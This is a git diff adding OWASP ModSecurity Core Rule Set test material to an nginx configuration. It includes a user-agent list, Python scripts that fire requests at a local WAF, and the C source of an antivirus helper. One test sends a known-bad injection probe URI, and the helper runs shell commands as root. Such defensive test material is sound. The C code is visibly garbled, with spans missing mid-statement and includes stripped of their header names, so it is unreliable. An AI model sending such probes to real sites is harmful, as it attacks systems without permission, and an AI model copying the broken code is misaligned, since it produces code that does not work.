(J2ME/MIDP; Opera Mini/4.2.14320/554; U; cs) Presto/2.2.0 +Opera/9.64 (Macintosh; PPC Mac OS X; U; en) Presto/2.1.1 +Opera/9.64 (X11; Linux i686; U; Linux Mint; nb) Presto/2.1.1 +Opera/9.80 (Android 4.0.4; Linux; Opera Mobi/ADR-1205181138; U; pl) Presto/2.10.254 Version/12.00 +Opera/9.80 (Android; Opera Mini/7.5.33361/31.1543; U; en) Presto/2.8.119 Version/11.1010 +Opera/9.80 (Android; Opera Mini/7.5.33361/31.1543; U; en) Presto/2.8.119 Version/11.1010 +Opera/9.80 (J2ME/MIDP; Opera Mini/5.0.16823/1428; U; en) Presto/2.2.0 +Opera/9.80 (Macintosh; Intel Mac OS X 10.4.11; U; en) Presto/2.7.62 Version/11.00 +Opera/9.80 (Macintosh; Intel Mac OS X 10.6.8; U; fr) Presto/2.9.168 Version/11.52 +Opera/9.80 (Macintosh; Intel Mac OS X; U; en) Presto/2.6.30 Version/10.61 +Opera/9.80 (S60; SymbOS; Opera Mobi/499; U; ru) Presto/2.4.18 Version/10.00 +Opera/9.80 (S60; SymbOS; Opera Mobi/499; U; ru) Presto/2.4.18 Version/10.00 +Opera/9.80 (Windows NT 5.1; U; zh-tw) Presto/2.8.131 Version/11.10 +Opera/9.80 (Windows NT 5.2; U; en) Presto/2.2.15 Version/10.10 +Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14 +Opera/9.80 (Windows NT 6.1; U; en) Presto/2.7.62 Version/11.01 +Opera/9.80 (Windows NT 6.1; U; es-ES) Presto/2.9.181 Version/12.00 +Opera/9.80 (Windows NT 6.1; WOW64) Presto/2.12.388 Version/12.16 +Opera/9.80 (X11; FreeBSD 8.1-RELEASE i386; Edition Next) Presto/2.12.388 Version/12.10 +Opera/9.80 (X11; Linux i686) Presto/2.12.388 Version/12.16 +Opera/9.80 (X11; Linux i686; U; en) Presto/2.2.15 Version/10.10 +Opera/9.80 (X11; Linux x86_64; U; pl) Presto/2.7.62 Version/11.00 +P3P Validator +POLARIS/6.01 (BREW 3.1.5; U; en-us; LG; LX265; POLARIS/6.01/WAP) MMP/2.0 profile/MIDP-2.1 Configuration/CLDC-1.1 +POLARIS/6.01(BREW 3.1.5;U;en-us;LG;LX265;POLARIS/6.01/WAP;)MMP/2.0 profile/MIDP-201 Configuration /CLDC-1.1 +Peach/1.01 (Ubuntu 8.04 LTS; U; en) +Python-urllib/2.5 +SAMSUNG-S8000/S8000XXIF3 SHP/VPP/R5 Jasmine/1.0 Nextreaming SMM-MMS/1.2.0 profile/MIDP-2.1 configuration/CLDC-1.1 FirePHP/0.3 +SAMSUNG-SGH-A867/A867UCHJ3 SHP/VPP/R5 NetFront/35 SMM-MMS/1.2.0 profile/MIDP-2.0 configuration/CLDC-1.1 UP.Link/6.3.0.0.0 +SAMSUNG-SGH-E250/1.0 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0 (compatible; Googlebot-Mobile/2.1; http://www.google.com/bot.html) +SEC-SGHE900/1.0 NetFront/3.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 Opera/8.01 (J2ME/MIDP; Opera Mini/2.0.4509/1378; nl; U; ssr) +SEC-SGHX210/1.0 UP.Link/6.3.1.13.0 +SEC-SGHX820/1.0 NetFront/3.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 +SearchExpress +SonyEricssonK310iv/R4DA Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Link/6.3.1.13.0 +SonyEricssonK550i/R1JD Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 +SonyEricssonK610i/R1CB Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 +SonyEricssonK750i/R1CA Browser/SEMC-Browser/4.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 +SonyEricssonK800i/R1CB Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Link/6.3.0.0.0 +SonyEricssonK810i/R1KG Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 +SonyEricssonS500i/R6BC Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 +SonyEricssonT100/R101 +SonyEricssonT610/R201 Profile/MIDP-1.0 Configuration/CLDC-1.0 +SonyEricssonT650i/R7AA Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 +SonyEricssonT68/R201A +SonyEricssonW580i/R6BC Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 +SonyEricssonW660i/R6AD Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 +SonyEricssonW810i/R4EA Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Link/6.3.0.0.0 +SonyEricssonW850i/R1ED Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 +SonyEricssonW950i/R100 Mozilla/4.0 (compatible; MSIE 6.0; Symbian OS; 323) Opera 8.60 [en-US] +SonyEricssonW995/R1EA Profile/MIDP-2.1 Configuration/CLDC-1.1 UNTRUSTED/1.0 +SonyEricssonZ800/R1Y Browser/SEMC-Browser/4.1 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Link/6.3.0.0.0 +SuperBot/4.4.0.60 (Windows XP) +UCWEB/8.8 (SymbianOS/9.2; U; en-US; NokiaE63) AppleWebKit/534.1 UCBrowser/8.8.0.245 Mobile +UCWEB/8.8 (iPhone; CPU OS_6; en-US)AppleWebKit/534.1 U3/3.0.0 Mobile +User agent: Mozilla/5.0 (Linux; Android 4.3; SPH-L710 Build/JSS15J) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.99 Mobile Safari/537.36 +Uzbl (Webkit 1.3) (Linux i686 [i686]) +Vodafone/1.0/V802SE/SEJ001 Browser/SEMC-Browser/4.1 +W3C_Validator/1.305.2.12 libwww-perl/5.64 +W3C_Validator/1.654 +WDG_Validator/1.6.2 +Web Downloader/6.9 +WebCopier v4.6 +WebZIP/3.5 (http://www.spidersoft.com) +Wget/1.9 cvs-stable (Red Hat modified) +Wget/1.9.1 +everyfeed-spider/2.0 (http://www.everyfeed.com) +facebookscraper/1.0( http://www.facebook.com/sharescraper_help.php) +grub-client-1.5.3; (grub-client-1.5.3; Crawl your own stuff with http://grub.org) +grub-client-1.5.3; (grub-client-1.5.3; Crawl your own stuff with http://grub.org) +iTunes/4.2 (Macintosh; U; PPC Mac OS X 10.2) +iTunes/4.2 (Macintosh; U; PPC Mac OS X 10.2) +iTunes/9.0.2 (Windows; N) +iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2; en-ca) +libwww-perl/5.820 +msnbot-media/1.1 ( http://search.msn.com/msnbot.htm) +msnbot/0.11 ( http://search.msn.com/msnbot.htm) +msnbot/1.0 ( http://search.msn.com/msnbot.htm) +msnbot/1.1 ( http://search.msn.com/msnbot.htm) +nook browser/1.0 +portalmmm/2.0 N410i(c20;TB) +w3m/0.5.1 +w3m/0.5.1 +wii libnup/1.0 diff --git a/nginx/config/owasp-crs/tests/regression/utils/testSampling.py b/nginx/config/owasp-crs/tests/regression/utils/testSampling.py new file mode 100644 index 00000000..5d3b7e9b --- /dev/null +++ b/nginx/config/owasp-crs/tests/regression/utils/testSampling.py @@ -0,0 +1,46 @@ +from ftw import ruleset, http, errors + +""" +This script assumes that default blocking action is 403 +and sampling is one. It will send a know bad request +that is expected to be blocked. If sampling is on it +will only block a certain percentage. We send 1000 +requests to verify this. In order to do this we must +also turn off IP Reputation blocking. +SecAction "id:900005,phase:1,nolog,pass,ctl:ruleEngine=on,ctl:ruleRemoveById=910000" +""" +def send_requests(input_data,subiters,result,index): + http_ua = http.HttpUA() + for i in range(0,subiters): + new_index = str(index)+str(i) + http_ua.send_request(input_data) + result[new_index] = http_ua.response_object.status +def run_requests(iterations): + """Post request with no content-type AND no content-length""" + x = ruleset.Input(method="GET", protocol="http",port=80,uri='/?X=">',dest_addr="localhost",headers={"Host":"localhost","User-Agent":"ModSecurity CRS 3 test"}) + import threading + returns = {} + threads = [] + for i in range(5): + t = threading.Thread(target=send_requests,args=(x,100, returns,i,)) + threads.append(t) + t.start() + for t in threads: + t.join() + status_not_403 = 0 + status_403 = 0 + for status in returns.values(): + if status == 403: + status_403 += 1 + else: + status_not_403 += 1 + x = (status_403/(len(returns)*1.0))*100 + y = (status_not_403/(len(returns)*1.0))*100 + print "403s =", x + print "not 403s =", y + return (x,y) + +def test_sampling(): + print "running" + block,passed = run_requests(100) + assert block < 55 and block > 45 diff --git a/nginx/config/owasp-crs/tests/regression/utils/testUserAgents.py b/nginx/config/owasp-crs/tests/regression/utils/testUserAgents.py new file mode 100644 index 00000000..9d25266f --- /dev/null +++ b/nginx/config/owasp-crs/tests/regression/utils/testUserAgents.py @@ -0,0 +1,37 @@ +from ftw import ruleset, http, errors + +""" +This script reads in a list of popular Useragents and checks to see if it triggers +It expects 403's to be returned for a rule firing +""" + +def read_useragents(filename): + f = open(filename,'r') + useragents = [agent.strip() for agent in f.readlines()] + return useragents + +def run_requests(useragent_list): + status_not_403 = 0 + status_403 = 0 + for useragent in useragent_list: + # get me a counter while i'm waiting + if (status_not_403 + status_403)%15 == 0: + print("Send",status_not_403 + status_403, "Out of",len(useragent_list)) + input_data = ruleset.Input(method="GET", protocol="http",port=80,uri='/',dest_addr="localhost",headers={"Host":"localhost","User-Agent":useragent}) + http_ua = http.HttpUA() + http_ua.send_request(input_data) + status = http_ua.response_object.status + if status == 403: + status_403 += 1 + else: + status_not_403 += 1 + x = (status_403/(len(useragent_list)*1.0))*100 + y = (status_not_403/(len(useragent_list)*1.0))*100 + print "403s =", x + print "not 403s =", y + + +def main(): + uas = read_useragents('./data/popularUAs.data') + run_requests(uas) +main() diff --git a/nginx/config/owasp-crs/util/README b/nginx/config/owasp-crs/util/README new file mode 100644 index 00000000..d9aa66dd --- /dev/null +++ b/nginx/config/owasp-crs/util/README @@ -0,0 +1,7 @@ +The util directory contains many supporting tools/scripts that may be used with +the OWASP ModSecurity CRS files. + +Docker Support +============== +A Dockerfile can be found in the docker/ directory, along with additional +notes in docker/README.md diff --git a/nginx/config/owasp-crs/util/av-scanning/runAV/common.c b/nginx/config/owasp-crs/util/av-scanning/runAV/common.c new file mode 100755 index 00000000..08d21289 --- /dev/null +++ b/nginx/config/owasp-crs/util/av-scanning/runAV/common.c @@ -0,0 +1,652 @@ +#include "common.h" + +int lock_file(char *filename) +{ + int fd; + + if (!filename) + return -1; + + if ((fd = open(filename,O_RDONLY | O_CREAT , S_IRWXU)) < 0) { + print_error("lock_file","open",modsec_rpc_log_file,errno); + return -1; + } + + flock(fd,LOCK_EX); + + return fd; +} + +int unlock_file(int fd) +{ + flock(fd,LOCK_UN); + return 0; +} + +int print_request(char* url,char *command,parameter_t *parameters, int num_of_parameters, int mask) +{ + char time_str[64], line[1024*1024]; + time_t t; + int fd; + int i; + + switch (atoi(modsec_rpc_log_level)) { + case DEBUG: + time(&t); + ctime_r(&t,time_str); + time_str[strlen(time_str)-1] = '\0'; + if ((fd = open(modsec_rpc_log_file,O_WRONLY | O_CREAT | O_APPEND | O_SYNC , S_IRWXU)) < 0) { + print_error("print_request","open",modsec_rpc_log_file,errno); + fd=2; + } + flock(fd,LOCK_EX); + sprintf(line,"%s:REQUEST-BEGIN:======================================\n",time_str); + line[1024*1024-1]='\0'; + write(fd,line,strlen(line)); + snprintf(line,1024*1024,"URL:%s\nCommand:%s\n",url,command); + line[1024*1024-1]='\0'; + write(fd,line,strlen(line)); + for (i=0; i 0 && output) output[0]='\0'; + if (!(fp=popen(command,"r"))) { + print_error("run_cmd","popen",command,errno); + return -1; + } + + while (output_size && fgets(line,output_size>1024?1024:output_size,fp)) { + strcat(output, line); + output_size -= strlen(line); + } + + if (!output_size) + while (fgets(line,1024,fp)); + + pclose(fp); + return 0; +} + +int find_param_idx(char *parameter_name, parameter_t *parameters, int max_parameters) +{ + int i, idx=-1; + + for (i = 0; (i < max_parameters) && (idx < 0); i++) + if ( strstr(parameters[i].name,parameter_name) ) + idx=i; + return idx; +} + +int parse_file(char *filename, parameter_t *parameters, int max_parameters) +{ + char line[1024], *ptr; + int i; + FILE *fp; + + if (!max_parameters || (parameters == NULL) || (filename == NULL)) { + print_error("parse_file","invalid input parameters","none",0); + return 0; + } + + if ((fp = fopen(filename,"r")) == NULL ) { + print_error("parse_file","fopen",filename,errno); + return 0; + } + + i=0; + while ( i < max_parameters && fgets(line,1024,fp)) { + if (ptr = strstr(line,"#")) + *ptr='\0'; + if (sscanf(line,"%[^=]=%s",parameters[i].name,parameters[i].value) != 2) + continue; + i++; + } + + fclose(fp); + + return i; +} + +int change_file(char *filename, parameter_t parameter) +{ + char line[1024], *name, *value; + int i, found=0; + FILE *fp; + + if (filename == NULL) + return 0; + + if ((fp = fopen(filename,"r+")) == NULL ) + return 0; + + i=0; + while ( fgets(line,1024,fp)) { + sscanf(line,"%[^=]=%s",name,value); + if (name && !strcmp(name,parameter.name)) { + fprintf(fp,"%s=%s\n",name,parameter.value); + found=1; + continue; + } else fprintf(fp,"%s",line); + } + + fclose(fp); + return found; +} + +int copy_file(char *src_file, char *dst_file) +{ + char line[1024]; + FILE *sfp, *dfp; + + if (src_file == NULL || dst_file == NULL) + return 0; + + if ((sfp = fopen(src_file,"r")) == NULL ) + return 0; + + if ((dfp = fopen(dst_file,"w")) == NULL ) { + fclose(sfp); + return 0; + } + + while ( fgets(line,1024,sfp)) + fprintf(dfp,"%s",line); + + fclose(sfp); + fclose(dfp); + return 1; +} + +int parse_query(char *query, parameter_t *parameters, int max_parameters) +{ + char *ptr, *dst_ptr, num[3]; + int i, len; + + if (!max_parameters || (parameters == NULL) || (query == NULL)) + return 0; + + ptr=query; + i=0; + while ((i < max_parameters) && *ptr) { + parameters[i].name[0] = '\0'; + dst_ptr = parameters[i].name; + len=0; + while (*ptr && (*ptr != '=') && (len++ < MAX_NAME_LENGTH)) { + if (*ptr == '%' && *(ptr+1) && *(ptr+2)) { + num[0]=*(ptr+1); + num[1]=*(ptr+2); + num[2]='\0'; + ptr += 3; + *dst_ptr=(char)strtol(num,NULL,16); + if (*dst_ptr) dst_ptr++; + } else *dst_ptr++ = *ptr++; + } + if (len >= MAX_NAME_LENGTH) + while (*ptr && (*ptr != '=')) + *ptr++; + if (*ptr) ptr++; + *dst_ptr = '\0'; + parameters[i].value[0] = '\0'; + dst_ptr = parameters[i].value; + len=0; + while (*ptr && (*ptr != '&') && (len++ < MAX_VALUE_LENGTH)) { + if (*ptr == '%' && *(ptr+1) && *(ptr+2)) { + num[0]=*(ptr+1); + num[1]=*(ptr+2); + num[2]='\0'; + ptr += 3; + *dst_ptr=(char)strtol(num,NULL,16); + if (*dst_ptr) dst_ptr++; + } else *dst_ptr++ = *ptr++; + } + if (len >= MAX_VALUE_LENGTH) + while (*ptr && (*ptr != '&')) + *ptr++; + if (*ptr) ptr++; + *dst_ptr = '\0'; + i++; + } + + return i; +} + +int parse_query_and_body (parameter_t *parameters, int max_parameters) +{ + char *query, *content_length_env; + int i, num_of_params, body_len, content_length; + + query = getenv("QUERY_STRING"); + if (query && *query) + return(parse_query(query,parameters,max_parameters)); + else { + content_length_env = getenv("CONTENT_LENGTH"); + if (!content_length_env) + return 0; + if (! *content_length_env) + return 0; + content_length=atol(content_length_env); + if (!(query=malloc(content_length+1))) + return 0; + i = 1; body_len=0; + while ( (body_len < content_length) && (i>0) ) { + i = read(0,query+body_len,(content_length-body_len)<1024?(content_length-body_len):1024); + if (i > 0 ) body_len+=i; + } + query[body_len] = '\0'; + num_of_params = parse_query(query,parameters,max_parameters); + free(query); + return num_of_params; + } +} + +int parse_cli (parameter_t *parameters, int max_parameters, int num_of_args, char *args[]) +{ + char name[MAX_NAME_LENGTH], value[MAX_VALUE_LENGTH]; + int i, num_of_params=0; + + if (num_of_args > 0) + for (i=0; i0) ) { + i = read(sock,reply+reply_len,(max_reply_size-reply_len)<1024?(max_reply_size-reply_len):1024); + if (i > 0 ) reply_len+=i; + } + reply[reply_len] = '\0'; + + shutdown(sock,SHUT_RDWR); + close(sock); + return reply_len; +} + +int find_ip_idx(char *ip, blocklist_t *blocklist, int num_of_ips) +{ + int i, idx=-1; + + for (i = 0; (i < num_of_ips) && (idx < 0); i++) + if ( strstr(blocklist[i].ip,ip) ) + idx=i; + return idx; +} + +int remove_ip_idx(char *ip, blocklist_t *blocklist, int num_of_ips) +{ + int i, j, idx=-1; + time_t t; + + time(&t); + for (i = 0; i < num_of_ips; i++) + if ( (ip && strstr(blocklist[i].ip,ip)) || (!ip && (t > blocklist[i].end)) ) { + idx=i; + for (j=i; j<(num_of_ips-1); j++) { + strcpy(blocklist[j].ip,blocklist[j+1].ip); + blocklist[j].start = blocklist[j+1].start; + blocklist[j].duration = blocklist[j+1].duration; + blocklist[j].end = blocklist[j+1].end; + strcpy(blocklist[j].token,blocklist[j+1].token); + } + num_of_ips--; + } + return idx; +} + +int read_conf_file (char *filename) +{ + int idx, num_of_params; + parameter_t parameters[MAX_PARAMS]; + + num_of_params=parse_file(filename,parameters,MAX_PARAMS); + + if ((idx = find_param_idx("MODSEC_CLI_HOME",parameters,num_of_params)) >= 0) + strcpy(modsec_cli_home,parameters[idx].value); + if ((idx = find_param_idx("MODSEC_RPC_HOME",parameters,num_of_params)) >= 0) + strcpy(modsec_rpc_home,parameters[idx].value); + + if ((idx = find_param_idx("MODSEC_RPC_LOG_FILE",parameters,num_of_params)) >= 0) + strcpy(modsec_rpc_log_file,parameters[idx].value); + + if ((idx = find_param_idx("MODSEC_RPC_LOG_LEVEL",parameters,num_of_params)) >= 0) + strcpy(modsec_rpc_log_level,parameters[idx].value); + + if ((idx = find_param_idx("MODSEC_RPC_SSL_LOCKFILE",parameters,num_of_params)) >= 0) + strcpy(modsec_rpc_ssl_lockfile,parameters[idx].value); + + if ((idx = find_param_idx("MODSEC_RPC_SENSOR_LOCKFILE",parameters,num_of_params)) >= 0) + strcpy(modsec_rpc_sensor_lockfile,parameters[idx].value); + + if ((idx = find_param_idx("MODSEC_RPC_REVERSEPROXY_LOCKFILE",parameters,num_of_params)) >= 0) + strcpy(modsec_rpc_reverseproxy_lockfile,parameters[idx].value); + + if ((idx = find_param_idx("MODSEC_RPC_EXTERNALNIC_LOCKFILE",parameters,num_of_params)) >= 0) + strcpy(modsec_rpc_externalnic_lockfile,parameters[idx].value); + + if ((idx = find_param_idx("MODSEC_RPC_MUI_LOCKFILE",parameters,num_of_params)) >= 0) + strcpy(modsec_rpc_mui_lockfile,parameters[idx].value); + + if ((idx = find_param_idx("MODSEC_RPC_LOG_LEVEL",parameters,num_of_params)) >= 0) + strcpy(modsec_rpc_log_level,parameters[idx].value); + + if ((idx = find_param_idx("MODSEC_PROXY_HOME",parameters,num_of_params)) >= 0) + strcpy(modsec_proxy_home,parameters[idx].value); + + if ((idx = find_param_idx("MODSEC_PROXY_IP",parameters,num_of_params)) >= 0) + strcpy(modsec_proxy_ip,parameters[idx].value); + + if ((idx = find_param_idx("MODSEC_PROXY_PORT",parameters,num_of_params)) >= 0) + strcpy(modsec_proxy_port,parameters[idx].value); + + if ((idx = find_param_idx("MODSEC_PROXY_NETWORK_PREFIX",parameters,num_of_params)) >= 0) + strcpy(modsec_proxy_network_prefix,parameters[idx].value); + + if ((idx = find_param_idx("MODSEC_PROXY_BIN",parameters,num_of_params)) >= 0) + strcpy(modsec_proxy_bin,parameters[idx].value); + + if ((idx = find_param_idx("MODSEC_PROXY_CONF",parameters,num_of_params)) >= 0) + strcpy(modsec_proxy_conf,parameters[idx].value); + + if ((idx = find_param_idx("MODSEC_PROXY_EXT_NIC",parameters,num_of_params)) >= 0) + strcpy(modsec_proxy_ext_nic,parameters[idx].value); + + if ((idx = find_param_idx("MODSEC_PROXY_PID",parameters,num_of_params)) >= 0) + strcpy(modsec_proxy_pid,parameters[idx].value); + + if ((idx = find_param_idx("MODSEC_PROXY_WHITELIST",parameters,num_of_params)) >= 0) + strcpy(modsec_proxy_whitelist,parameters[idx].value); + + if ((idx = find_param_idx("MODSEC_PROXY_BLACKLIST",parameters,num_of_params)) >= 0) + strcpy(modsec_proxy_blacklist,parameters[idx].value); + + if ((idx = find_param_idx("MODSEC_PROXY_TIMEOUT",parameters,num_of_params)) >= 0) + strcpy(modsec_proxy_timeout,parameters[idx].value); + + if ((idx = find_param_idx("MODSEC_PROXY_EXCHANGE",parameters,num_of_params)) >= 0) + strcpy(modsec_proxy_exchange,parameters[idx].value); + + if ((idx = find_param_idx("MODSEC_PROXY_EXT_IPS",parameters,num_of_params)) >= 0) + strcpy(modsec_proxy_ext_ips,parameters[idx].value); + + if ((idx = find_param_idx("MODSEC_MUI_UI_ADMIN",parameters,num_of_params)) >= 0) + strcpy(modsec_mui_ui_admin,parameters[idx].value); + + if ((idx = find_param_idx("MODSEC_RPC_PASSWORD_FILE",parameters,num_of_params)) >= 0) + strcpy(modsec_rpc_password_file,parameters[idx].value); + + if ((idx = find_param_idx("MODSEC_MUI_UI_IPADDRESS",parameters,num_of_params)) >= 0) + strcpy(modsec_mui_ui_ipaddress,parameters[idx].value); + + if ((idx = find_param_idx("MODSEC_MUI_UI_PORT",parameters,num_of_params)) >= 0) + strcpy(modsec_mui_ui_port,parameters[idx].value); + + if ((idx = find_param_idx("SENSOR_ID",parameters,num_of_params)) >= 0) + strcpy(sensor_id,parameters[idx].value); + + if ((idx = find_param_idx("SERIAL",parameters,num_of_params)) >= 0) + strcpy(serial,parameters[idx].value); + + if ((idx = find_param_idx("VERSION_NUMBER",parameters,num_of_params)) >= 0) + strcpy(version_number,parameters[idx].value); + + if ((idx = find_param_idx("RELEASE_DATE",parameters,num_of_params)) >= 0) + strcpy(release_date,parameters[idx].value); + + if ((idx = find_param_idx("BRIDGE_MODE",parameters,num_of_params)) >= 0) + strcpy(bridge_mode,parameters[idx].value); + + if ((idx = find_param_idx("DATA_DISK_SPACE",parameters,num_of_params)) >= 0) + strcpy(data_disk_space,parameters[idx].value); + + if ((idx = find_param_idx("CONN_RATE",parameters,num_of_params)) >= 0) + strcpy(conn_rate,parameters[idx].value); + + if ((idx = find_param_idx("CONN_RATE_PER_ADDR",parameters,num_of_params)) >= 0) + strcpy(conn_rate_per_addr,parameters[idx].value); + + if ((idx = find_param_idx("CONNS",parameters,num_of_params)) >= 0) + strcpy(conns,parameters[idx].value); + + if ((idx = find_param_idx("CONNS_PER_ADDR",parameters,num_of_params)) >= 0) + strcpy(conns_per_addr,parameters[idx].value); + + if ((idx = find_param_idx("MODSEC_RPC",parameters,num_of_params)) >= 0) + strcpy(modsec_rpc,parameters[idx].value); + + if ((idx = find_param_idx("MODSEC_PROXY",parameters,num_of_params)) >= 0) + strcpy(modsec_proxy,parameters[idx].value); + + if ((idx = find_param_idx("MODSEC_PROXY_SCRIPT",parameters,num_of_params)) >= 0) + strcpy(modsec_proxy_script,parameters[idx].value); + + return num_of_params; +} + +int init_cgi() +{ + char *modsec; + + setresuid(0,0,0); + setresgid(0,0,0); + + strcpy(modsec_cli_home,"/opt/modsecurity-cli"); + strcpy(modsec_rpc_home,"/opt/modsecurity-rpc"); + strcpy(modsec_rpc_log_file,"/opt/modsecurity-rpc/var/logs/rpc.log"); + strcpy(modsec_rpc_log_level,"0"); + strcpy(modsec_rpc_ssl_lockfile,"/opt/modsecurity-rpc/var/run/ssl.lock"); + strcpy(modsec_rpc_sensor_lockfile,"/opt/modsecurity-rpc/var/run/sensor.lock"); + strcpy(modsec_rpc_externalnic_lockfile,"/opt/modsecurity-rpc/var/run/externalnic.lock"); + strcpy(modsec_rpc_reverseproxy_lockfile,"/opt/modsecurity-rpc/var/run/reverseproxy.lock"); + strcpy(modsec_rpc_mui_lockfile,"/opt/modsecurity-rpc/var/run/mui.lock"); + strcpy(modsec_proxy_home,"/opt/modsecurity-proxy"); + strcpy(modsec_proxy_ip,"127.0.0.2"); + strcpy(modsec_proxy_port,"80"); + strcpy(modsec_proxy_bin,"/bin/modsec-proxyd"); + strcpy(modsec_proxy_script,"/etc/init.d/modsec-proxy"); + strcpy(modsec_proxy_conf,"/etc/httpd.conf"); + strcpy(modsec_proxy_ext_nic,"eth0"); + strcpy(modsec_proxy_network_prefix,"172.16.0.0/12"); + strcpy(modsec_proxy_pid,"/opt/modsecurity-proxy/var/run/httpd.pid"); + strcpy(modsec_proxy_whitelist,"/opt/breach/etc/modsec_whitelist.conf"); + strcpy(modsec_proxy_blacklist,"/opt/breach/etc/modsec_blacklist.conf"); + strcpy(modsec_proxy_timeout,"120"); + strcpy(modsec_proxy_exchange,"/opt/modsecurity-proxy/var/exchange"); + strcpy(modsec_proxy_ext_ips,"/opt/breach/etc/modsec_ips.conf"); + strcpy(modsec_mui_ui_ipaddress,"127.0.0.1"); + strcpy(modsec_mui_ui_port,"443"); + strcpy(modsec_rpc_password_file,"/opt/modsecurity-rpc/etc/.htpasswd"); + strcpy(modsec_mui_ui_admin,"admin"); + strcpy(sensor_id,"1"); + strcpy(serial,"1"); + strcpy(version_number,"2.0"); + strcpy(bridge_mode,"off"); + strcpy(data_disk_space,"60"); + strcpy(release_date,"11-15-2006"); + strcpy(conn_rate,"0"); + strcpy(conn_rate_per_addr,"0"); + strcpy(conns,"0"); + strcpy(conns_per_addr,"0"); + + if (modsec = getenv("MODSEC")) + read_conf_file(modsec); + else { + if (!read_conf_file("/opt/breach/etc/modsec.conf")) + read_conf_file("/etc/modsec.conf"); + } + + return 0; +} diff --git a/nginx/config/owasp-crs/util/av-scanning/runAV/common.h b/nginx/config/owasp-crs/util/av-scanning/runAV/common.h new file mode 100755 index 00000000..da494107 --- /dev/null +++ b/nginx/config/owasp-crs/util/av-scanning/runAV/common.h @@ -0,0 +1,99 @@ +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#define MAX_PARAMS 256 +#define MAX_IPS 256 +#define MAX_NAME_LENGTH 256 +#define MAX_VALUE_LENGTH 1024 +#define MAX_CMD_LENGTH 1024 +#define MAX_TOKEN_LENGTH 1024 +#define MAX_OUTPUT_LINE_LEN (1024) +#define MAX_OUTPUT_SIZE (MAX_OUTPUT_LINE_LEN*1024) +#define WHITE 1 +#define BLACK 0 +#define NONE 0 +#define DEBUG 1 + +typedef struct { + char name[MAX_NAME_LENGTH]; + char value[MAX_VALUE_LENGTH]; +} parameter_t; + +typedef struct { + char ip[16]; + time_t start; + long duration; + time_t end; + char token[MAX_TOKEN_LENGTH]; +} blocklist_t; + +EXTERN int lock_file(char *filename); +EXTERN int unlock_file(int fd); +EXTERN int print_reply(char *reply); +EXTERN int print_error(char *func1, char* func2, char* str, int err); +EXTERN int print_request(char* url,char *command,parameter_t *parameters, int num_of_parameters, int mask); +EXTERN int print_request_force(char* url,char *command,parameter_t *parameters, int num_of_parameters, int mask); +EXTERN int is_proxy_up(); +EXTERN int run_cmd(char *command, char *output, int output_size); +EXTERN int parse_cli (parameter_t *parameters, int max_parameters, int num_of_args, char *args[]); +EXTERN int parse_query_and_body(parameter_t *parameters, int max_parameters); +EXTERN int parse_query(char *query, parameter_t *parameters, int max_parameters); +EXTERN int parse_file(char *filename, parameter_t *parameters, int max_parameters); +EXTERN int copy_file(char *src_file, char *dst_file); +EXTERN int change_file(char *filename, parameter_t parameter); +EXTERN int find_param_idx(char *parameter_name, parameter_t *parameters, int max_parameters); +EXTERN int init_cgi(); +EXTERN int send_request(char *request,char *ip,char *port,char *reply,int max_reply_size); +EXTERN int find_ip_idx(char *ip, blocklist_t *blocklist, int num_of_ips); +EXTERN int remove_ip_idx(char *ip, blocklist_t *blocklist, int num_of_ips); + +EXTERN char modsec_rpc[1024]; +EXTERN char modsec_rpc_home[1024]; +EXTERN char modsec_rpc_log_file[1024]; +EXTERN char modsec_rpc_log_level[1024]; +EXTERN char modsec_rpc_ssl_lockfile[1024]; +EXTERN char modsec_rpc_externalnic_lockfile[1024]; +EXTERN char modsec_rpc_sensor_lockfile[1024]; +EXTERN char modsec_rpc_reverseproxy_lockfile[1024]; +EXTERN char modsec_rpc_mui_lockfile[1024]; +EXTERN char modsec_proxy[1024]; +EXTERN char modsec_proxy_home[1024]; +EXTERN char modsec_proxy_script[1024]; +EXTERN char modsec_proxy_ip[1024]; +EXTERN char modsec_proxy_port[1024]; +EXTERN char modsec_proxy_bin[1024]; +EXTERN char modsec_proxy_conf[1024]; +EXTERN char modsec_proxy_ext_nic[1024]; +EXTERN char modsec_proxy_pid[1024]; +EXTERN char modsec_proxy_whitelist[1024]; +EXTERN char modsec_proxy_blacklist[1024]; +EXTERN char modsec_proxy_network_prefix[1024]; +EXTERN char modsec_proxy_timeout[1024]; +EXTERN char modsec_proxy_exchange[1024]; +EXTERN char modsec_proxy_ext_ips[1024]; +EXTERN char modsec_rpc_password_file[1024]; +EXTERN char modsec_mui_ui_admin[1024]; +EXTERN char modsec_mui_ui_ipaddress[1024]; +EXTERN char modsec_mui_ui_port[1024]; +EXTERN char modsec_cli_home[1024]; +EXTERN char sensor_id[1024]; +EXTERN char serial[1024]; +EXTERN char version_number[1024]; +EXTERN char bridge_mode[1024]; +EXTERN char data_disk_space[1024]; +EXTERN char release_date[1024]; +EXTERN char conn_rate[1024]; +EXTERN char conn_rate_per_addr[1024]; +EXTERN char conns[1024]; +EXTERN char conns_per_addr[1024]; diff --git a/nginx/config/owasp-crs/util/av-scanning/runAV/comp b/nginx/config/owasp-crs/util/av-scanning/runAV/comp new file mode 100755 index 00000000..aeee5db5 --- /dev/null +++ 